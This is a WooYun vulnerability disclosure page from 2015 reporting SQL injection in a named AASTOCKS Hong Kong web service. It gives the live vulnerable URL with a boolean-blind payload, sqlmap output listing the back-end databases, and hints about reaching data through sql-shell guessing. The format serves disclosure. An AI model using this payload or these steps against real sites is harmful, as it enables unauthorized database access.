hk阿思达克某站点存在sql注入 | wooyun-2015-0124687

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0124687

漏洞标题：

hk阿思达克某站点存在sql注入

漏洞详情

披露状态：

2015-07-09：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-08-23：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

参数无过滤导致sql注入

详细说明：

http://services3.aastocks.com/xyzq/market_stockquote_server.aspx?symbol=03968&stockid=hk&source=AA&newsid=NOW.676866' AND 9173=9173 AND 'chri'='chri
参数newsid存在sql注入 poc

sqlmap identified the following injection points with a total of 82 HTTP(s) requests:
---
Parameter: newsid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: symbol=03968&stockid=hk&source=AA&newsid=NOW.676866' AND 9173=9173 AND 'chri'='chri
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [24]:
[*] [\x06 dbox_UP]
[*] [\x08ePoqq@BOCA]
[*] [CAiEDa\x10B]
[*] [FinP\x1f\x03\x04l]
[*] [Q=\x10 rA\x11\x04@e\\chn]
[*] [Q\x02pa\x10t]A]
[*] [Rbdbox_`qInd\x10ea]
[*] [Redbox_CM ALtqa\x1d]
[*] [Redbqt]HPqPqA]
[*] [RSda@A\x08SA]
[*] asdb
[*] Chi_News
[*] Chn_NenMoael
[*] Chn_News
[*] FestqielEion
[*] ICPew
[*] master
[*] model
[*] OthheT
[*] Q
[*] Qews
[*] Quote_CD_L1
[*] Redbox_BD
[*] RedBoxA2M

漏洞证明：

当前用户是webconnect

数据库中有两个用户

不是dba
直接在后面sqlmap.py -u XXX -D Chi_News --tables不能获取表内容，但是用sql-shell，还是可以字典碰撞的

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 CF_tan@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 CF_tan@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞